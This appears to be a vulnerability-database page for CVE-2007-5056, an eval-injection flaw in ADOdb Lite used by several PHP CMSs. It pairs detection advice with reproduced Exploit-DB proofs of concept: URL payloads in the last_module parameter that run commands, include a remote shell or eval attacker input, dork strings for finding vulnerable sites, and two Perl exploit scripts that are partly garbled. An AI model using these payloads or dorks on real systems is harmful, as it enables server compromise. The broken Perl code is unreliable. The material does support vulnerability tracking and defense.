CVE-2007-5056
published 2007-09-24CVE-2007-5056: Eval injection vulnerability in adodb-perf-module.inc.php in ADOdb Lite 1.42 and earlier, as used in products including CMS Made Simple, SAPID CMF…
PriorityP353medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
27.87%
97.9th percentile
Eval injection vulnerability in adodb-perf-module.inc.php in ADOdb Lite 1.42 and earlier, as used in products including CMS Made Simple, SAPID CMF, Journalness, PacerCMS, and Open-Realty, allows remote attackers to execute arbitrary code via PHP sequences in the last_module parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adodb_lite | adodb_lite | <= 1.42 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor HTTP requests targeting adodb-perf-module.inc.php with a `last_module` parameter containing PHP class injection patterns (e.g., `{}`, `eval`, `passthru`, `include`) — these are the direct exploit vectors for this eval-injection vulnerability. ↗
- →The vulnerable eval statement is `eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');` — alert on any request where `last_module` contains characters such as `{`, `}`, `;`, or known PHP function names. ↗
- →Exploitation requires `register_globals = On` in php.ini; environments with this setting enabled and the vulnerable file publicly accessible are at highest risk. ↗
- →Search web server logs for the dork string `Powered by PacerCMS` combined with requests to `adodb-perf-module.inc.php` to identify reconnaissance activity preceding exploitation. ↗
- →Search web server logs for the dork string `Powered by SAPID CMF Build 87` combined with requests to `adodb-perf-module.inc.php` to identify reconnaissance activity preceding exploitation. ↗
- →Search web server logs for the dork string `powered by CMS Made Simple version 1.1.2` combined with requests to `adodb-perf-module.inc.php` to identify reconnaissance activity preceding exploitation. ↗
- ·Exploitation is only possible when PHP's `register_globals` directive is enabled (`On`), which allows the `last_module` GET parameter to be injected directly into the eval call. Systems with `register_globals = Off` are not exploitable via this vector. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PacerCMS 0.6 - 'last_module' Remote Code Execution
exploitdb·2008-02-10
CVE-2007-5056 PacerCMS 0.6 - 'last_module' Remote Code Execution
PacerCMS 0.6 - 'last_module' Remote Code Execution
---
### PacerCMS 0.6 (last_module) Remote Code Execution Vulnerability
### Script : http://ovh.dl.sourceforge.net/sourceforge/pacercms/pacercms0.6.zip
### Dork : Powered by PacerCMS
### POC :
### /includes/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};passthru(ls);//
### OR INCLUDE SHELL
### /includes/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};include(URL-SHELL);//
### I'm TrYaGi ......:)
# milw0rm.com [2008-02-10]
Exploit-DB
SAPID CMF Build 87 - 'last_module' Remote Code Execution
exploitdb·2008-02-10
CVE-2007-5056 SAPID CMF Build 87 - 'last_module' Remote Code Execution
SAPID CMF Build 87 - 'last_module' Remote Code Execution
---
### SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability
### Script R84 : http://puzzle.dl.sourceforge.net/sourceforge/sapidcmf/sapidcmf.r84.zip
### Script Update R87 :http://surfnet.dl.sourceforge.net/sourceforge/sapidcmf/sapidcmf.update.r84-r87.zip
### Dork : Powered by SAPID CMF Build 87
### Vuln :
### 09: */
eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');
### POC :
### /vendors/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};passthru(ls);//
### OR INCLUDE SHELL
### /vendors/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};include(URL-SHELL);//
### I'm TrYaGi ......:)
# milw0rm.com [2008-02-10]
Exploit-DB
Journalness 4.1 - 'last_module' Remote Code Execution
exploitdb·2008-02-09
CVE-2007-5056 Journalness 4.1 - 'last_module' Remote Code Execution
Journalness 4.1 - 'last_module' Remote Code Execution
---
#!/usr/bin/perl
#
# Vendor url: journalness.sourceforge.net
#
# note: exploit requires Register_globals = On in php.ini
# ~Iron
# http://www.randombase.com
require LWP::UserAgent;
print "#
# Journalness );
if($target !~ /^http:\/\//)
{
$target = "http://".$target;
}
if($target !~ /\/$/)
{
$target .= "/";
}
print "PHP code to evaluate? ";
chomp($code=);
$code =~ s/(|new;
$ua->timeout(10);
$ua->env_proxy;
$response = $ua->get($target);
if ($response->is_success)
{
print "\n"."#" x 20 ."\n";
print $response->content;
print "\n"."#" x 20 ."\n";
}
else
{
die "Error: ".$response->status_line;
}
# milw0rm.com [2008-02-09]
Exploit-DB
Open-Realty 2.4.3 - 'last_module' Remote Code Execution
exploitdb·2008-02-09
CVE-2007-5056 Open-Realty 2.4.3 - 'last_module' Remote Code Execution
Open-Realty 2.4.3 - 'last_module' Remote Code Execution
---
#!/usr/bin/perl
#
# Vendor url: www.open-realty.org
#
# note: exploit requires Register_globals = On in php.ini
# ~Iron
# http://www.randombase.com
require LWP::UserAgent;
print "#
# Open-Realty );
if($target !~ /^http:\/\//)
{
$target = "http://".$target;
}
if($target !~ /\/$/)
{
$target .= "/";
}
print "PHP code to evaluate? ";
chomp($code=);
$code =~ s/(|new;
$ua->timeout(10);
$ua->env_proxy;
$response = $ua->get($target);
if ($response->is_success)
{
print "\n"."#" x 20 ."\n";
print $response->content;
print "\n"."#" x 20 ."\n";
}
else
{
die "Error: ".$response->status_line;
}
# milw0rm.com [2008-02-09]
Exploit-DB
CMS Made Simple 1.2 - Remote Code Execution
exploitdb·2007-09-21
CVE-2007-5056 CMS Made Simple 1.2 - Remote Code Execution
CMS Made Simple 1.2 - Remote Code Execution
---
# o [bug] /"*._ _ #
# . . . .-*'` `*-.._.-'/ #
# o o < * )) , ( #
# . o `*-._`._(__.--*"`.\ #
# #
# vuln.: CMS Made Simple 1.1.2 Remote Code Execution Vulnerability #
# author: [email protected] #
# download: #
# http://dev.cmsmadesimple.org/frs/download.php/1424/cmsmadesimple-1.1.2.zip #
# dork: "powered by CMS Made Simple version 1.1.2" #
# greetz: cOndemned, kacper, str0ke #
# code:
/lib/adodb_lite/adodb-perf-module.inc.php:
...
eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');
...
# exploit:
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=phpinfo();
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php
No writeups or analysis indexed.
http://osvdb.org/40596http://osvdb.org/41422http://osvdb.org/41426http://osvdb.org/41427http://osvdb.org/41428http://secunia.com/advisories/26928http://secunia.com/advisories/28859http://secunia.com/advisories/28873http://secunia.com/advisories/28874http://secunia.com/advisories/28886http://www.attrition.org/pipermail/vim/2007-September/001800.htmlhttp://www.securityfocus.com/bid/25768http://www.vupen.com/english/advisories/2007/3261https://exchange.xforce.ibmcloud.com/vulnerabilities/36733https://exchange.xforce.ibmcloud.com/vulnerabilities/40389https://exchange.xforce.ibmcloud.com/vulnerabilities/40393https://exchange.xforce.ibmcloud.com/vulnerabilities/40395https://exchange.xforce.ibmcloud.com/vulnerabilities/40396https://www.exploit-db.com/exploits/4442https://www.exploit-db.com/exploits/5090https://www.exploit-db.com/exploits/5091https://www.exploit-db.com/exploits/5097https://www.exploit-db.com/exploits/5098http://osvdb.org/40596http://osvdb.org/41422http://osvdb.org/41426http://osvdb.org/41427http://osvdb.org/41428http://secunia.com/advisories/26928http://secunia.com/advisories/28859http://secunia.com/advisories/28873http://secunia.com/advisories/28874http://secunia.com/advisories/28886http://www.attrition.org/pipermail/vim/2007-September/001800.htmlhttp://www.securityfocus.com/bid/25768http://www.vupen.com/english/advisories/2007/3261https://exchange.xforce.ibmcloud.com/vulnerabilities/36733https://exchange.xforce.ibmcloud.com/vulnerabilities/40389https://exchange.xforce.ibmcloud.com/vulnerabilities/40393https://exchange.xforce.ibmcloud.com/vulnerabilities/40395https://exchange.xforce.ibmcloud.com/vulnerabilities/40396https://www.exploit-db.com/exploits/4442https://www.exploit-db.com/exploits/5090https://www.exploit-db.com/exploits/5091https://www.exploit-db.com/exploits/5097https://www.exploit-db.com/exploits/5098
2007-09-24
Published